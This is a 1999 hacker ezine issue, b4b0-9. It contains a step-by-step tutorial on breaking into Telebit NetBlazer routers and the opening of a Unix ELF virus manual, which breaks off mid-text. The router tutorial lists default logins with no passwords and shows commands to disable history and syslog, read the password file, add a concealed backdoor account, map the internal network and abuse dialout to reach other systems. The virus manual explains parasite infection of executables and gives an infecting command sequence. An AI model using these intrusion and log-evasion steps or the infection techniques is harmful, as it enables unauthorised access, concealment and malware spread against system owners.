b4b0!b4b0!b4b0!b4b0!b4b0!!b4b0-[ .b4b0-IX. ]-!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! [ B 4 B 0 ] &$&$&$&$& &$&$&$& &$&$& &$&$&$& &$&$&$&$& &$&$&$&$&$&$&$&$&$&$&$&$& &$&$&$www.b 4 b 0.org&$&$&$ &$&$&$&$&$&$&$&$&$&$&$&$& $&$&$&$&$&$ $&$&.

$&$& $&$&$&$&$&$ &$&$&$&$&$&$ &$&$ $&$& $&$& &$&$ &$&$ $&$& &$&$&$ &$&$ $&$& &$&$ $&$& $&$& $&$& &$&$ &$&$ &$ &$&$ &$&$ -$&$&$ $&$&$&$&$&$&$& &$&$ -$&$&$ &$&$ &$ &$&$ $&$& $&$& &$&$&$&$&$&$&$ $&$& $&$& &$&$ &$ &$&$ &$&$ &$&$ &$&$ &$&$ &$&$ &$&$ &$&$&$ $&$&$&$&$&$ &$&$ $&$&$&$&$&$ &$&$&$&$&$&$ [ (c) 1999 The B4B0 Party Programme ] b4b0-9-b4b0-9-b4b0-9-[ Episode IX - THE PH4NT0M M31NEL ]-b4b0-9-b4b0-9-b4b0-9 <sean__> frankly. im tired of tips constant sexual advances towards me. b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!

-* B4B0 ST4FF *[ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ ge0rge tEEp PhFh4Ck3r KuR4cK gRE-0p sEEgn4l thE MiLk jEEmEE tYE-mAHt phEEckZ hIE-bRIhD aH-lEHck smIEleH pAH-bEhL sEEl-vEE-0h pBX-PhREEk m1st4h cl34n ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> ]------------b4b0------------b4b0------------> jorge tip jsbach chrak gr1p rsh MiLk-MaN jimmy tymat phix hybrid alec smiler pabell silvio PBXPhreak mr clean

-* B4B0-9 C0NTR1BUT3RZ *Articles, Juarez, Ascii... diab / silvio / tip / gr1p / Synner / m0nty / PBXphreak / Creed / opt1mus pr1me zortinator / polder / majere / hybrid / ep1d / rsh / icesk / Vortexia / dm / coek / MiLk-MaN

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*______________ / \ | wh3r3 1z d4t | | b4b0 k0de!!! | \_____ _____/ \ / $$$$$$$$$ \/ \(_)-(_)/ / ( O ) \ /-\ / _\\_//_ / \_/ \ / \ /_/ \_\ (_) (_) |_________| \ / \ | / |_|_| (_/ \_) <mk33> g-: WTF is a 'kode'? -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*[!@#$#@!] Table of Contents [!@#$#@!] [ 1]--[ [ 2]--[ [ 3]--[ [ 4]--[ [ 5]--[ [ 6]--[ [ 7]--[ [ 8]--[ [ 9]--[ [10]--[ [11]--[ [12]--[ [13]--[ Hacking the Telebit Netblazer The Unix Virus Manual BT ClickDial - Web Enabled CTI Chaos Magick Theory Satellites and Sat. Communication Ericsson Consona MD110 PBX Knark - Kernel based Linux rootkit Dismantle the FCC An introduction to BASIC Stamps DECnet Fun Digital Access Carrier System DACS Introduction to Encryption (V.1) Can People read your mind? ]---------------> ]---------------> ]---------------> ]---------------> ]---------------> ]---------------> ]---------------> ]---------------> ]---------------> ]---------------> ]---------------> ]---------------> ]---------------> diab silvio gr1p Synner Monty PBXPhreak Creed opt1mus/zort polder majere hybrid ep1d silvio

[!@#$#@!] Juarez [!@#$#@!] [ [ [ [ [ [ 1]--[ 2]--[ 3]--[ 4]--[ 5]--[ 6]--[ ipop.c clickdial.zip knark-0.41.tar.gz fuckme.c killsentry.c fakescan.c ]----------------------> ]----------------------> ]----------------------> ]----------------------> ]----------------------> ]----------------------> rsh gr1p Creed icesk Vortexia Vortexia

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*<tip> yo <tip> brb. -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-Greets: hybrid, 9x, Substance, The Veiled Society BBS, w1rep4ir, x.25

haqrs, jarvis, csoft, samj, jcb, m1x, schemerz, vhd, nop, st0ner, jsbach, m0nty, doctor_x, Synner, fuzebox, icesk, diab, ohday, tymat, majere, dr_phace, ch4x, NoU, polder, micah, euk, knight, ganja farmers, rude boyz, Persiadic, lusta, tewl, rtm, jennicide, Esko, dephile, mynd, assem, The Hill Street Blues Cafe in Amsterdam, duke, anything old-school, rach, tGb, Katie Holmes, gob, ep1d, jayenz, wyze1, oclet, demos, active, Prince Naseem Hammed (Ex-Telco. Engineer!), all the contributers and b4b0 staff for keeping it real. - Thanks: Australia (ALOC - (Australian Legion Of Crash-overrides) *not* included). - Links: http://ipindex.dragonstar.net (FUQN OWNZ) http://virus.beergrave.net (Unix-Virus Mailing List) http://freeusers.digibel.be/~c0ur1erz (x.25) Thought: "Its Better to be coming down than to have never been high at all". --> RIP: T34M D4C0M Email b4b0! : letters@b4b0.org Submit to b4b0! : submissions@b4b0.org View b4b0! : http://www.b4b0.org -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*<datu> hey can u do dcc in bitchx? -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*[!@#$#@!] INTRODUCTION [!@#$#@!] Yeah, b4b0-9 is finally here, sorry about the delay; actually we're not sorry. Some people have been busy, while others have just been plain lazy. If you feel the need to blame something, blame that. This is a pretty large issue with some varied content, so enjoy, and let's see submissions rolling in for b4b0-10 plz. - The Limey Bastard B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.01][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*) (*)H A C K I N G T H E T E L E B I T N E T B L A Z E R(*) (*) A brief tutorial by diab (*) (*) DATE: ermm.. sometime in 99 (*) (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*) [[==========================================================================]] ---[ I N D E X ] [[==========================================================================]] - What exactly is a TELEBIT netblazer? - Identifying a TELEBIT netblazer - Where's the default logins?!?

Basic commands once inside netblazer System logging Finding and viewing the password/user file Adding an account Exploring the system / network Some neat features and tips Conclusion / Greets / Contacts etc...

[[==========================================================================]] ---[ What exactly is a TELEBIT netblazer? ] [[==========================================================================]] TELEBIT netblazers have been around for a while. Iam sure if you did a lot of wardialing or inet scanning you would of came across one. They are fairly popular in the LAN world. I have only come across 2 types of netblazer routers which are: NetBlazer Sti/40i: Used on fairly big LAN's for large companies. e.g. industrial areas. NetBlazer LS: Not as powerful as the Sti and 40i platforms. Used on small office/home office environments. Both offer seamless client-to-LAN remote network access, on-demand LAN-to-LAN interconnection, and dial-out modem sharing. The newest version of NetBlazer is 3.6 I think but most NetBlazers are the same only minor changes to programs etc. In this txt I will explain the benefits of a netblazer to a hacker. The commands it uses are kinda like unix and dos (e.g. dir and grep etc). I will try to make this file as brief as possible as it is written in a format for a article in a ezine. To obtain more information about netblazers visit www.telebit.com or use search engines etc. PLEASE NOTE : the account used for all this information below was the root account, you must have an account which has the same privs as root to perform all of the tasks. Anyway on with the show.... [[==========================================================================]] ---[ Identifying a TELEBIT netblazer ] [[==========================================================================]] Telebit's netblazer can be found on the internet and on dialup modems. Through various tcp/ip scanning or wardialing you might come across a login banner like the following: Telebit's NetBlazer Version 3.1 NB login: Password: As you can see the netblazer proudly identifies itself. If you somehow managed to get an account on the netblazer, either by sniffing or using the defaults later on in this paper, you will have a command prompt like this: NB:Top> If you don't have a command prompt and you just slip straight into a slip or ppp session then you could either use the account for inet access or try another account that will give you the command prompt. [[==========================================================================]] ---[ Where's the default logins?!? ] [[==========================================================================]]

Yeah you guessed it... netblazer has default logins. More of the older type of netblazers (3.1 and below) have default logins. Below are default accounts that could (if the admin is dumb) get you in: USERNAME =========== lan test snmp default-ppp remote MAV setup PASSWORD ========== <nopasswd> <nopasswd> <nopasswd> <nopasswd> <nopasswd> <nopasswd> <setup/nopasswd> COMMENT ========================================= : seen before : havent seen before probably exist > 3.1 : seen before : seen before : havent seen before probably exist > 3.1 : havent seen before probably exist > 3.1 : seen before

snmp and setup have the same privledges as root. Try those two first before trying the rest as the others may not allow you to do much at all except starting a slip or ppp session. If your lucky the other accounts might have permission to view the password file. [[==========================================================================]] ---[ Important commands and directories ] [[==========================================================================]] Iam not going to spend a great deal of time explaining commands on netblazer. However I will explain some of the important commands in the 'Bin' directory. To get information about the commands available at a particular menu level, use the ? command. Example: NB:Top> ? Available commands: bin> configure> history> list> sessions> shutdown

disk> logout top>

help reboot ?

Words with '>' at the end means its a directory, the others are commands. To get all the commands available (and there is quiet a few) on the netblazer type 'commands' in any directory. Important commands in the 'Bin' directory are: Command Description ======================================================================== activate : activate a ppp or slip session. edit : ummm duh. bin edit <filename>. tcl : Used to setup complex command scripts. dir : Directory listing on the diskette. type : Like 'cat' in unix and type in DOS. bin type <filename> background : Run a command in the background. bin background <command> <args> output : Sends output of a command into a file. bin output [-a] <filename> source : Runs a series of commands in a file (like shell scripts). where : Shows you where you are on the command tree. tty : Displays line or port you are currently logged on to. who }\ more } \_ Iam not going to explain these commands because they are grep } / exactly like unix. echo }/ ======================================================================== You can also get the command reference manual information about a particular

command by using the "man" command, and get information about the available commands on a topic by doing "man -k topic", e.g. man -k add The important directories that you should take note of are: ============================================================================ Bin : Where all the basic commands are held. Configure : All the configuration commands and files are. History : History logging (like .bash_history in unix) Configure>Dialout>: Commands used while dialing out. Configure>IP> : IP configuration for mapping out the network. Configure>Line> : Commands that give information about certain modem lines. Configure>Security> : All the security files/commands are here. Configure>Syslog> : All system log files/commands are here. Configure>User> : Commands used to add users, configure users etc. Sessions: Commands used to start certain sessions, config etc. e.g. telnet List>: Commands in this directory give info about network/system stats. [[==========================================================================]] ---[ System logging ] [[==========================================================================]] The first thing to do is to turn off 'History'. The history directory is like the .bash_history in unix. Simply type this: NB:Top> history off NB:Top> history status history not on Remember turn history back on as you leave if it was turned on previously. The next thing to do is check whether the server you hacked has syslog and syslog buffer on. Do this by typing 'syslog' then 'buffer list' : NB:Top> syslog NB:Top>Configure>Syslog> buffer list If both are on you will get something like the following: NB:Top>Configure>Syslog> buffer list Tue Feb 23 2:49:02 1999 - root logged-in from 203.24.123.2:1590 Tue Feb 23 2:49:50 1999 - root on 203.24.123.2:1590 at Feb 23 for 48 seconds NB:Top>Configure>Syslog> If syslog and syslog buffer are on you need to see whether it is logging on the current server or another server. Also you need to know the general layout of the syslog. You can do this by typing 'list' in the Syslog directory: NB:Top>Configure>Syslog> list sending syslog messages to 203.191.2.100, facility = local0 syslog to console is off syslog to buffer is on; level <= 4 syslog internal buffer size = 20K syslog to session is on; level <= 6 syslog interval is off (Levels: 0-emerg,1-alert,2-crit,3-err,4-warning,5-notice,6-info,7-debug) (Counts: 0-0, 1-0, 2-0, 3-0, 4-0, 5-1, 6-9, 7-1) Syslog requested - 11, ignored - 11, queued - 0, dropped - 0 If your Syslog messages are logged to another server then you need to hack the server its sending it to or you can disable it sending to the remote

server by doing 'syslog host off' but that might raise the admins eyebrow. Notice the levels of severity. You will find these in the syslog buffer. Here is a table that explains the level of severity in descending order: Level | Message Severity | ========================================================================== 0 | emerg - panic conditions requiring immediate attention | 1 | alert - conditions that should be corrected immediately | 2 | crit - critical error conditions | 3 | err - other error conditions | 4 | warning - warning messages | 5 | notice - non-error conditions requiring special handling | 6 | info - informational messages | 7 | debug - messages that are used only for debugging | ========================================================================== By default netblazer has syslog off therefore syslog buffer is off. If syslog and syslog buffer is on you need to turn syslog buffer off or filter the syslog messages so that it nulls out your telnet connections out of the server or root connections or whatever you really want. Here are the two ways of doing it: Turn syslog buffer off: NB:Top>Configure>Syslog> buffer off Null out all 'telnet' connections out of syslog buffer: NB:Top>Configure>Syslog> message telnet "" Sometimes the admin might use 'syslog interval' (you should of seen whether it was on/off when you typed 'list'), which tells netblazer to send syslog messages for logged-in users at specified intervals. Theres another logging program on the system called 'watchdog' which is disabled by default. Watchdog allows access (via Passwords) only to files and directories that you specify. You can specify whether specfic users can read or write in specific directories, or only read old files, or only creat new files, you can even encrypt files and do many other neat things. To disable watchdog type 'server stop watchdog'. If it was on previsiously put it back on by typing 'server start watchdog'. [[==========================================================================]] --[ Viewing the password file ] [[==========================================================================]] To see the password file, move into directory 'List' and execute the command 'user' : NB:Top>List> user USERID root diab .....(there should PASSWORD CRYPTO USE 1sfeqss39MXsY login 7IaBbQyo5lEIM Dial PPP be a lot more listed below) PRIVS FLG SCDTM--------M----DEST-GROUP

The above password file showed a user with complete system privs (root) and just a normal user. Now I will explain the password file layout. USERID: The username of the user. PASSWORD: The DES encrypted password for the user. CRYPTO: Assigns a crypto key to the user. A crypto key should only be assigned to dynamic interface packet mode user IDs, ARA users, or dial-in

users who have the capability to respond to a crypto challenge. USE: Whether the user can login into a shell or goes straight into a PPP or slip session. (When you have access to a shell you can execute a PPP or slip session). PRIVS: What Priveledges the user has on the server. These are: S=status C=config D=dial-ok T=telnet/rlogin-ok A=acs-ok B=ARA-ok M=multi-login-ok FLAGS: X=clone N=from-network DEST-GROUP: Assigning a user to a destination group lets you restrict that user's dialout, telnet, and/or rlogin access to only those destination that are defined in the user's destination group. [[==========================================================================]] ---[ Adding a account ] [[==========================================================================]] Okay basically you need an account that blends in with the rest of the user list. To add a user do the following: NB:Top> user NB:Top>Configure>User> add <username> In this case I will add the user 'jack'. NB:Top>Configure>User> add jack NB:Top>Configure>User> list jack USERID PASSWORD CRYPTO USE jack login

PRIVS FLG --DT------

DEST-GROUP

As you can see jack has no password set and has jackshit privledges so we need to update these: First change jacks password... NB:Top>Configure>User> password jack Changing password for jack New Password: Retype Password: Okay, jacks password is set, we now then decide whether to upgrade his privs or not. If you think its gonna standout too much don't upgrade the privs but if you want more control of the system upgrade them. We now decide to upgrade. Format is: user privilege <userid> <[-]conf> <[-]stat> NB:Top>Configure>User> user privilege jack conf stat NB:Top>Configure>User> list jack USERID PASSWORD CRYPTO USE PRIVS FLG jack 7IaBbQyo5lEIM login SCDT------

DEST-GROUP

So now jack has a password, decent priveledges and blends in with the rest of the user file. From this step we now explore the system / network. [[==========================================================================]] ---[ Exploring the system / network ] [[==========================================================================]]

If the netblazer is on a dialup modem check whether the box is connected to the net. Move into the configuration ip directory and type 'address': NB:Top> ip NB:Top>Configure>IP> address Global IP address is 132.0.4.3 This gives you the global ip address for the box. Next time your on the net resolve the ip and check if the ip has a webpage etc. If it is connected to the net like the above look to see what ports are open on the box by typing 'tcp list': NB:Top>Configure>IP> tcp list (You will have a load of tcp statistics here but what your after is below it) # &TCB Rcv-Q Snd-Q Local socket Remote socket State 02 1a3cd0 0 0 0.0.0.0:21 0.0.0.0:0 Listen (S) 03 1a48c4 0 0 0.0.0.0:79 0.0.0.0:0 Listen (S) 04 1a0e20 0 0 0.0.0.0:23 0.0.0.0:0 Listen (S) As we can see port 21 (ftp), 79 (finger) and 23 (telnet) are open. Other ways of gathering more network information is going into the 'List' diectory and displaying some config files. e.g. 'list servers' etc. Example: NB:Top>List> servers Server Status bootp off discard off echo off finger on ftp on gdb off raw off rip on snmp on ipxsnmp off status off telnet on watchdog off macip off telnet on 203.146.7.223 telnet on 80 httpd AppleTalk servers: adsp on To see what processors are running on the box NB:Top>List> ps Pgroup pid user stksize maxstk heap main 1 system 8K 2.2K 1097K main 2 system 8K 1.2K 153K main 3 system 8K 0.9K 8K main 4 system 8K 1.3K 17K main 5 system 8K 0.1K 8K main 6 system 4K 1.1K 4K main 7 system 8K 0.2K 8K main 8 system 4K 0.1K 4K main 10 system 4K 0.5K 4K type 'list ps': event flags time name 3c4e04 IW 47.8 main I 3H en0 fc5b0 IW 2:51 killer 39.0 timer ecd0c W 0.0 tracer ff9e8 W 1:17 syslog a715c W 3.8 comport_proc 101b30 IW 0.0 syslog_slow 386bd8 IW 55:41 namru-19200 ra

.119:1439 11940 httpd .236:1686 11980 httpd .236:1686 11981 httpd 3.65:4794 21054 root main 21064 system .156:1183 21066 httpd .156:1183 21067 httpd main 21068 system (This is actually a shorter more.)

8K 0.3K 8K 3c3ef4 8K 1.4K 14K 1c1128 8K 0.3K 8K 1c29a0 8K 0.4K 8K 3c3f44 2K 0.7K 4K 1d9bc0 8K 1.4K 14K 10357c 8K 0.3K 8K 3c3f6c 2K 0.7K 4K 3323f8 version of the processors

IW IW IW IW IW IW IW IW there

0.0 telser_in 0.0 in_telnet 0.0 telser_in 0.0 telser_in 0.0 line100 0.0 in_telnet 0.0 telser_in 0.0 line112 should be a lot

To see a list of boxes connected to the network type 'list arp': NB:Top> list arp received 146788 badtype 0 badlen 0 bogus addr 0 request in 144200 replies 910 request out 938 for us 0 IP addr Type Interface Time Q Addr 203.146.12.11 ether any 871 00:a0:c9:da:e7:6b 203.146.12.10 ether any 794 00:00:0c:06:0d:e1 203.146.12.21 ether any 554 00:a0:24:14:f6:55 203.146.12.20 ether any 725 00:10:5a:9c:98:30 203.146.12.4 ether any 705 00:00:c0:de:1b:b3 203.146.12.113 ether any 877 00:20:af:75:3d:e4 203.146.12.1 ether any 450 00:00:0c:19:b4:e2 203.146.12.0 ether any 0 ff:ff:ff:ff:ff:ff To see the modem line statistics type 'line statistics': NB:Top>Configure>Line> statistics Line Speed Bytes in Bytes out Overruns Dropped line00 9600 0 64 0 0 line01 9600 0 64 0 0 line02 9600 0 64 0 0 line100 115200 59028233 441419764 0 0 line101 115200 57090452 348643058 0 0 line102 19200 45969368 30098161 0 0 line103 115200 48166164 273295927 0 0 line104 115200 54454271 435126641 0 0 line105 9600 0 64 0 0 line106 115200 45593641 302021248 0 0 line107 115200 47639900 313846050 0 0 line110 115200 59897334 366434651 0 0 line111 115200 86619249 403328465 0 0 line112 115200 44791599 331359218 0 0 line113 115200 41869 20337 0 0

Queued 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

Doing Idle Idle Idle Idle Idle PPP PPP Idle Idle Idle Idle Idle Idle Idle Idle

The 'list' directory and the commands in it will give you all the info you need about mapping the network out. A feature netblazer has is the option of dialing out of the system. I will explain how to use this later but for now we need to gather up information about what computers that users on the netblazer have been dialing to. We do this by typing 'dialout list': NB:Top>dialout Name gtbupdate tnb41 98210 nb220 hunting1 bog0r1 bog0r2 list Phone 1-409-755-3766 9321 9321 9321 24029973 02598878592 02593164706 Characteristics dialout internaldial internaldial internaldial dialout2 pepdialout dialout

slipdrn31 lapan_sl nbp98s bpsrouter

71678231 68938334 313449057 351349747

info-only info-only pepdialout info-only

The file is divided up into 3 sections. 1) Name: is the username that is assigned to the dialout. 2) Phone: is the phone number of the dialout. 3) Characteristics: The netblazer comes with ten standard dialout characteristic groups: dialout, v32dialout, pepdialout, request, raw, raw_dial, v25dialout, bridialout, isdndialout, and mpool. The dialout or v32dialout groups should be used for most destinations. By viewing the dialout list we now have other boxes to try to hack and there is a good chance the username for the dialout will have the same username/ password as the netblazer you are on now. Theres many other things you can do next. If you are root or privledges equal to root then go through all directories and view configuration files etc (type <filename>). Also do a scan of the companies subnet to see if you have access to any of the boxes that are connected to the companies network. [[==========================================================================]] ---[ Some neat features and tips] [[==========================================================================]] Like many other boxes connected to the net you can telnet out, use ftp, etc. This is good for diverting over the internet. The syntax for it is almost exactly the same as unix: Telneting out: NB:Top>sessions telnet <host> FTPing somewhere: NB:Top>sessions tftp <host> Now I will move to the outdialing feature. Okay, first of all you have to know what country the netblazer is located in so that you can use the correct country codes for dialing. Once you found out the country code format you can add a dialout number to the dialout file. Do this by typing 'dialout add'. You will be then prompted for the name of the dialout, phonenumber etc. Only add the dialout before you use it, don't leave it on the system so delete it straight after finishing it. Example for adding a dialout follow's: NB:Top>Configure>Dialout> add Name of dialout: branch Phone number: 555-1234 Line characteristics [dialout]: (just press enter; default = dialout) Char mode timeout (in minutes) [60]: Dialout: name=branch, phone=555-1234, characteristics=dialout Okay (yes|no|quit) [y]? okay now lets check if everthing is added in correctly: NB:Top>dialout Name tbupdate nb41 9821 nb21 hunting list Phone 1-408-745-3700 9821 9821 9821 2302373 Characteristics dialout internaldial internaldial internaldial dialout2

bogor1 bogor2 slipdrn31 branch

0251328592 0251314706 3169811 555-1234

pepdialout dialout info-only dialout

Yep, everything looks okay... now to test it. We use the command 'session dial <name>'. NB:Top>session dial branch There is another way of dialing out IF the number dial security is enabled. By default it is not so thats why I showed you the above method but if it is enable all you have to do is: dialout <phone-number> [<characteristic-group>]. No need to make your own entry. After using the dialout I would advise you to remove it by doing 'dialout delete <dialout_name>'. TIPS FOR NETBLAZER ================== - Always divert when hacking any dialup carrier. - Dont over abuse the dialout option on the netblazer. - Dont over abuse the netblazer for internet connection. - If the netblazer is on the net, telnet into the netblazer rather then dialing into it as you can divert more easly over the internet. - Do regular check ups to see if the company has added any new dialout numbers or users etc. - Just use your head. [[==========================================================================]] ---[ Conclusion, Contacts and Greets ] [[==========================================================================]] Well the TELEBIT Netblazer is a interesting system, like I said before its a mixture if DOS and unix commands. It offers some nice features to play around with once you have access. Getting access in the first place is obviously the hardest part but if you have a account on the system and can login through telnet (doesnt execute a PPP or slip session as soon as you login) you can have a go at cracking the passwd file if you have permission to view it. Thats about all I have to say about TELEBIT netblazer, I hope this txt gave you some idea's, information and what not about the system. I can be contacted at the following places: E-mail: baid@hobbiton.org Other: diab@irc, various BBS's ;). Greetings to: ozymands, buo, contagis, #hpaus, #x25, limelight BBS, *.au, gr1p, vhd, jorge, #tmp.out (duke, rclocal, rfp, sblip etc). - EOF B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.02][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 UNIX VIRUSES - Silvio Cesare <silvio@big.net.au> - http://www.big.net.au/~silvio

CONTENTS -------IMPROVING THIS MANUAL THE UNIX-VIRUS MAILING LIST INTRODUCTION THE NON ELF INFECTOR FILE VIRUS (FILE INFECTION) MEMORY LAYOUT OF AN ELF EXECUTABLE ELF INFECTION THE TEXT SEGMENT PADDING VIRUS (PADDING INFECTION) INFECTING INFECTIONS THE DATA SEGMENT VIRUS (DATA INFECTION) VIRUS DETECTION THE TEXT SEGMENT VIRUS (TEXT INFECTION) INFECTION USING OBJECT CODE PARASITES OBJECT CODE LINKING THE IMPLEMENTED INFECTOR NON (NOT AS) TRIVIAL PARASITE CODE BEYOND ELF PARASITES AND ENTER VIRUS IN UNIX THE LINUX PARASITE VIRUS DEVELOPMENT OF THE LINUX VIRUS IMPROVING THE LINUX VIRUS VIRUS DETECTION EVADING VIRUS DETECTION IN ELF INFECTION CONCLUSION SOURCE (UUENCODED) IMPROVING THIS MANUAL For any comments or suggestions (even just to say hi) please contact the author Silvio Cesare, <silvio@big.net.au>. This paper already has future plans to include more parasite techniques and shared object infection. More to come. THE UNIX-VIRUS MAILING LIST This is the charter for the unix-virus mailing list. Unix-virus was created to discuss viruses in the unix environment from the point of view of the virus creator, and the security developer writing anti-virus software. Anything related to viruses in the unix environment is open for discussion. Low level programming is commonly seen on the list, including source code. The emphasis is on expanding the knowledge of virus technology and not on the distribution of viruses, so binaries are discouraged but not totally excluded. The list is archived at http://virus.beergrave.net and it is recommended that the new subscriber read the existing material before posting. To subscribe to the list send a message to majordomo@virus.beergrave.net with 'subscribe unix-virus' in the body of the message. INTRODUCTION This paper documents the algorithms and implementation of UNIX parasite and virus code using ELF objects. Brief introductions on UNIX virus detection and evading such detection are given. An implementation of various ELF parasite infectors for UNIX is provided, and an ELF virus for Linux on x86 architecture is also supplied. Elementary programming and UNIX knowledge is assumed, and an understanding of Linux x86 architecture is assumed for the Linux implementation. ELF understanding is not required but will help.

This paper does not document any significant virus programming techniques except those that are only applicable to the UNIX environment. Nor does it try to replicate the ELF specifications. The interested reader is advised to read the ELF documentation if this paper is unclear in ELF specifics. THE NON ELF INFECTOR FILE VIRUS (FILE INFECTION) An interesting, yet simple idea for a virus takes note, that when you append one executable to another, the original executable executes, but the latter executable is still intact and retrievable and even executable if copied to a new file and executed. # cat host >> parasite # mv parasite host # ./host PARASITE Executed Now.. if the parasite keeps track of its own length, it can copy the original host to a new file, then execute it like normal, making a working parasite and virus. The algorithm is as follows: * * * * * execute parasite work code lseek to the end of the parasite read the remaining portion of the file write to a new file execute the new file

The downfall with this approach is that the remaining executable no longer remains strip safe. This will be explained further on when a greater understanding of the ELF format is obtained, but to summarize, the ELF headers no longer hold into account every portion of the file, and strip removes unaccounted portions. This is the premise of virus detection with this type of virus. This same method can be used to infect LKM's following similar procedures. MEMORY LAYOUT OF AN ELF EXECUTABLE A process image consists of a 'text segment' and a 'data segment'. The text segment is given the memory protection r-x (from this its obvious that self modifying code cannot be used in the text segment). The data segment is given the protection rw-. The segment as seen from the process image is typically not all in use as memory used by the process rarely lies on a page border (or we can say, not congruent to modulo the page size). Padding completes the segment, and in practice looks like this. key: [...] M P Page Nr #1 #2 #3 A complete page Memory used in this segment Padding \ |- A segment /

[PPPPMMMMMMMMMMMM] [MMMMMMMMMMMMMMMM] [MMMMMMMMMMMMPPPP]

Segments are not bound to use multiple pages, so a single page segment is quite possible.

Page Nr #1

[PPPPMMMMMMMMPPPP]

<- A segment

Typically, the data segment directly proceeds the text segment which always starts on a page, but the data segment may not. The memory layout for a process image is thus. key: [...] T D P Page Nr #1 #2 #3 #4 #5 #6 A complete page Text Data Padding <<<<<<Part Part Part Part Part Part of of of of of of the the the the the the text text text data data data segment segment segment segment segment segment

[TTTTTTTTTTTTTTTT] [TTTTTTTTTTTTTTTT] [TTTTTTTTTTTTPPPP] [PPPPDDDDDDDDDDDD] [DDDDDDDDDDDDDDDD] [DDDDDDDDDDDDPPPP]

pages 1, 2, 3 constitute the text segment pages 4, 5, 6 constitute the data segment >From here on, the segment diagrams may use single pages for simplicity. eg Page Nr #1 #2 [TTTTTTTTTTTTPPPP] [PPPPDDDDDDDDPPPP] <- The text segment <- The data segment

For completeness, on x86, the stack segment is located after the data segment giving the data segment enough room for growth. Thus the stack is located at the top of memory (remembering that it grows down). In an ELF file, loadable segments are present physically in the file, which completely describe the text and data segments for process image loading. A simplified ELF format for an executable object relevant in this instance is. ELF Header . . Segment 1 Segment 2 . .

<- Text <- Data

Each segment has a virtual address associated with its starting location. Absolute code that references within each segment is permissible and very probable. ELF INFECTION To insert parasite code means that the process image must load it so that the original code and data is still intact. This means, that inserting a parasite requires the memory used in the segments to be increased. The text segment compromises not only code, but also the ELF headers including such things as dynamic linking information. It may be possible to keep the text segment as is, and create another segment consisting of the parasite code,

however introducing an extra segment is certainly questionable and easy to detect. Page padding at segment borders however provides a practical location for parasite code given that its size is able. This space will not interfere with the original segments, requiring no relocation. Following the guideline just given of preferencing the text segment, we can see that the padding at the end of the text segment is a viable solution. Extending the text segment backwards is a viable solution and is documented and implemented further in this article. Extending the text segment forward or extending the data segment backward will probably overlap the segments. Relocating a segment in memory will cause problems with any code that absolutely references memory. It is possible to extend the data segment, however this isn't preferred, as its not UNIX portable that properly implement execute memory protection. An ELF parasite however is implemented using this technique and is explained later in this article. THE EXECUTABLE AND LINKAGE FORMAT A more complete ELF executable layout is (ignoring section content - see below). ELF Header Program header table Segment 1 Segment 2 Section header table optional In practice, this is what is normally seen. ELF Header Program header table Segment 1 Segment 2 Section header table Section 1 . . Section n Typically, the extra sections (those not associated with a segment) are such things as debugging information, symbol tables etc. >From the ELF specifications: "An ELF header resides at the beginning and holds a ``road map'' describing the file's organization. Sections hold the bulk of object file information for the linking view: instructions, data, symbol table, relocation information, and so on. ... ... A program header table, if present, tells the system how to create a process image. Files used to build a process image (execute a program) must have a program header table; relocatable files do not need one. A section header

table contains information describing the file's sections. Every section has an entry in the table; each entry gives information such as the section name, the section size, etc. Files used during linking must have a section header table; other object files may or may not have one. ... ... Executable and shared object files statically represent programs. To execute such programs, the system uses the files to create dynamic program representations, or process images. A process image has segments that hold its text, data, stack, and so on. The major sections in this part discuss the following. Program header. This section complements Part 1, describing object file structures that relate directly to program execution. The primary data structure, a program header table, locates segment images within the file and contains other information necessary to create the memory image for the program." An ELF object may also specify an entry point of the program, that is, the virtual memory location that assumes control of the program. Thus to activate parasite code, the program flow must include the new parasite. This can be done by patching the entry point in the ELF object to point (jump) directly to the parasite. It is then the parasite's responsibility that the host code be executed - typically, by transferring control back to the host once the parasite has completed its execution. >From /usr/include/elf.h typedef struct { 